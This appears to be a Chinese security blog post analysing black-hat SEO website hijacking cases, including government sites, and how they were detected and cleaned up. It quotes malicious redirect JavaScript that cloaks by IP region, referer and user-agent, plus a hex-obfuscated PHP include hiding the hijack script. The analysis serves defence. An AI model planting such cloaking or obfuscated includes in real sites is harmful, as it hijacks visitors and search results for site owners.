. 概述

上段時間一直忙于處理大會安全保障與應急，借助公司云悉情報平臺，發(fā)現(xiàn)并處置幾十起網(wǎng)站被劫持的情況。對黑客SEO技術(shù)頗有感覺。正好這段時間有時間，把以前遇到比較有趣的案例和大家分享一下。里面很多技術(shù)其實早已被玩透，只是網(wǎng)上搜了一下并無太多這方面的介紹。所以在這里共享一下相關(guān)的案例，案例主要分享一下思路。

1.1 原理

網(wǎng)站劫持是一個相對古老的技術(shù)，主要是黑帽用來做SEO用。實現(xiàn)網(wǎng)站劫持如果以下步驟:

1. 入侵相關(guān)網(wǎng)站2. 然后在網(wǎng)站中插入JS或修改其配置文件，增加相應的劫持代碼。另外一般會加入判斷條件，判斷條件一般會根據(jù)user-agent或referer進行判斷。大多數(shù)判斷條件會判斷是爬蟲還是人工，如果是人工會返回正常的網(wǎng)站；如果是爬蟲，會返回相關(guān)博彩、娛樂類等黑客設置好的網(wǎng)站3. 人工訪問時，會顯示正常網(wǎng)站。但是爬蟲去訪問時，返回是相關(guān)博彩、娛樂類網(wǎng)站，導致收錄的卻是黑客精心準備好的網(wǎng)站4. 黑帽SEO基本上都是給爬蟲收錄的，對于正常的人工訪問會返回正常的內(nèi)容，所以導致這種網(wǎng)站很難發(fā)現(xiàn)、并且其存留時間相對較長
1.2 跳轉(zhuǎn)判斷

下面通過在實際工作中遇到的JS腳本來闡述JS劫持來實現(xiàn)跳轉(zhuǎn)的方法。該JS腳本綜合運用了判斷IP歸屬地、UA、referer來進行跳轉(zhuǎn)判斷。

1.2.1 判斷IP歸屬地

判斷遠程IP的歸屬地，如果遠程IP為安徽省或北京，則會直接跳轉(zhuǎn)到http://www.anhui365.net/404.html這個頁面；歸屬地不為安徽或北京的話則會跳轉(zhuǎn)到博彩站點http://m.an888.top/

var jump_myt=setInterval(function(){
 if(remote_ip_info) {
 clearInterval(jump_myt);
 if(remote_ip_info.province=='安徽' ||remote_ip_info.province=='\u5b89\u5fbd'||remote_ip_info.city=='\u5317\u4eac'||remote_ip_info.city=='北京') {
 window.location.;
 }
 else{
 window.location='http://m.an888.top/'; 
 }
 }

1.2.2 判斷referer

若referer關(guān)鍵字為:baidu、google、yahoo、bing、soso、360等搜索引擎爬蟲，當爬蟲去訪問時會調(diào)用browserRedirect()函數(shù)。browserRedirect()函數(shù)主要用來實現(xiàn)跳轉(zhuǎn)判斷。

function go_bots_url(){
 var init_flag="93989",
 bct=document.referrer,
 bot=['baidu', 'google', 'yahoo', 'bing', 'soso', 'sogou', '360.cn', 'so.com','youdao', 'anquan', 'sm.cn', 'haosou'];
 for (var iin bot) {
 if(bct.indexOf(bot[i]) !=-1) {
 init_flag="1245";
 browserRedirect();
 }
 }
 if(init_flag=="93989"){
 call_init_error();
 }

1.2.3 判斷user-agent

如果相應的user-agent匹配關(guān)鍵字ipad、iphone os、midp、ucweb、android等移動端設備時則會跳轉(zhuǎn)到http://m.an888.top/這個博彩站點

function browserRedirect() { 
 var sUserAgent=navigator.userAgent.toLowerCase(); 
 var bIsIpad=sUserAgent.match(/ipad/i)=="ipad"; 
 varbIsIphoneOs=sUserAgent.match(/iphone os/i)=="iphone os"; 
 var bIsMidp=sUserAgent.match(/midp/i)=="midp"; 
 var bIsUc7=sUserAgent.match(/rv:1.2.3.4/i)=="rv:1.2.3.4"; 
 var bIsUc=sUserAgent.match(/ucweb/i)=="ucweb"; 
 var bIsAndroid=sUserAgent.match(/android/i)=="android"; 
 var bIsCE=sUserAgent.match(/windows ce/i)=="windows ce"; 
 var bIsWM=sUserAgent.match(/windows mobile/i)=="windows mobile"; 
 if (bIsIpad ||bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { 
 window.location.; 
 } else { 
 window.location='http://m.an888.top/'; 
 } 
}

這是一個比較經(jīng)典的JS判斷條件，綜合判斷IP地址、user-agent、referer。黑客入侵相應的網(wǎng)站后只需要把在網(wǎng)站中加入引用的JS相關(guān)網(wǎng)站即可，一般都是直接在相關(guān)調(diào)用頁面，如index.php這種頁面中直接插入下面的代碼

1.3 表現(xiàn)

當網(wǎng)站被黑客入侵并作為SEO使用時，一般的表現(xiàn)是通過人工訪問并無法直接打開，需要通過改變?yōu)g覽器的user-agent及referer時才可以重現(xiàn)相應的劫持頁面。頁面被劫持一般表現(xiàn)是下面這樣子的:

劫持案例-1(植入寄生蟲程序)

劫持案例-2(插入推廣內(nèi)容)

劫持案例-3(打開頁面跳轉(zhuǎn)到博彩網(wǎng)站)

2. 前端劫持案例

2.1 原理

前端劫持一般都是在網(wǎng)站的相應頁面中插入JS腳本，通過JS來進行跳轉(zhuǎn)劫持。

2.2 表現(xiàn)與檢測

前端劫持的話瀏覽器會執(zhí)行相應的JS腳本，因此我們可以通過抓包來進行檢測相應的JS腳本。可以使用burpsuite、fiddler、wireshark等工具來抓包進行分析與檢測。另外也可以打開相應的頁面分析其源碼來進行判斷，通過源碼找出所有加載的JS腳本，然后再對JS腳本進行分析。

2.3 案例

一網(wǎng)站發(fā)現(xiàn)其打開時會跳轉(zhuǎn)到博彩網(wǎng)站，對其源碼進行分析，發(fā)現(xiàn)其頁面被插入一段JS代碼，導致其打開時會跳轉(zhuǎn)到博彩站點。

3. 服務器端劫持案例

3.1 原理

服務器端劫持也稱為后端劫持，其是通過修改網(wǎng)站動態(tài)語言文件,如global.asax、global.asa、conn.asp、conn.php這種文件。這些文件是動態(tài)腳本每次加載時都會加載的配置文件，如訪問x.php時會加載conn.php。這樣的話，只需要修改這些全局的動態(tài)腳本文件(如global.asax)，訪問所有的aspx文件時都會加載這個global.asax文件，可以達到全局劫持的效果。

3.2 表現(xiàn)與檢測

因為這種文件是在服務器上執(zhí)行的，因此不像前端劫持那樣可以分析加載的惡意JS腳本。其需要在服務器上進行分析。一般檢測都是要檢測全局腳本文件，分析其是否被惡意修改。這種文件一般情況下不會經(jīng)常修改，因此可以使用文件完整性進行檢測。初次配置好了以后生成其MD5或HASH值，并且周期性對比其MD5值是否變化。若變化則進行變化內(nèi)容的分析與檢測。

3.3 案例

發(fā)現(xiàn)一政府網(wǎng)站上存在較多博彩類鏈接。但是對其源碼與抓包分析，都沒發(fā)現(xiàn)可疑JS腳本。這樣的話肯定是在服務器端做劫持的。

于是遠程連接其服務器，其網(wǎng)站使用aspx開發(fā)，找到其aspx全局加載的文件global.asax。分析其源碼，發(fā)現(xiàn)存在被修改，增加了爬蟲判斷條件，若為爬蟲訪問，則直接跳轉(zhuǎn)到相應的博彩網(wǎng)站。

針對服務器端的劫持，找到相應的插入的代碼。直接將其刪除，或者使用備份的文件進行覆蓋。但是這樣并不能真正解決問題，一般情況下global.asax這種文件被修改，基本上說明黑客已經(jīng)入侵到相應服務器。因此需要做全面的應急響應，分析日志、查殺webshll、系統(tǒng)層、應用層全面的安全檢查。找到黑客是如何入侵進來的并且修復相應的漏洞這樣才能真正解決此類問題。

4. 比較奇葩的服務器劫持案例

一般情況下，如果是服務器端的劫持通過上面的方法基本上可以找到黑客插入或修改的源碼部分。但是昨天遇到一起比較奇葩的服務器劫持案例。通過源碼與抓包分析判斷黑客是在服務器端做的劫持，但是相應的分析全局文件找了很長時間就是沒有找到黑客在什么地方插入劫持代碼的。

一政府站使用爬蟲UA打開就是相應的寄生蟲模板，直接分析其index.php文件，發(fā)現(xiàn)其只是調(diào)用了另外一個文件。文件的路徑為:/phpcms/base.php

找到base.php，由于其源碼比較多。分析其源碼找了好久就是沒有找到劫持所用的代碼，后來經(jīng)同事協(xié)助，花了好長時間才找到黑客進行劫持所有的代碼。base.php其中直接加載了公用的函數(shù)庫，其加載了如下函數(shù):

@include(PACK(‘H*’,’443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31′));

Php的pack函數(shù)功能如下：

@include(PACK(‘H*’,’443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31′));其中:

H代表16進制

443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31表示相應的參數(shù)，需要將其進行轉(zhuǎn)換。

轉(zhuǎn)換后，其內(nèi)容為\web\lyq\uploadfile1721，也就是說base.php使用include的Pack函數(shù)調(diào)用了\web\lyq\uploadfile1721這個文件。找到這個文件，分析其源碼，果然找到了黑客用戶進行劫持所調(diào)用的文件。

這個案例還是比較奇葩的，其實實現(xiàn)方法也是在服務器端進行劫持的，只是其使用函數(shù)來加載相應的劫持腳本。并且這個劫持的腳本放在一個上傳的目錄上，所以導致分析起來中間有些麻煩。針對這種劫持的情況個人感覺相對較好的處置方法就是對關(guān)鍵性的文件，如index.php、global.asax、conn.php等生成基線MD5及HASH值，然后周期性的對比這些文件完整性，如發(fā)現(xiàn)文件完整性發(fā)生變化，將其與基線文件進行比較。分析是否為正常變化。

目前黑帽做SEO除了上面的外，還有植入JS來挖礦的。不過挖礦在實際工作中只在服務器上遇到被植入挖礦程序，自己并沒有遇到過在網(wǎng)站中植入JS來挖礦。網(wǎng)上看到有遇到過植入JS來進行挖礦的，所以網(wǎng)站頁面代碼中的JS也是網(wǎng)站安全分析的重點。后期云悉情報平臺會加入惡意JS的識別與分析，遇到相關(guān)案例時再和大家分享。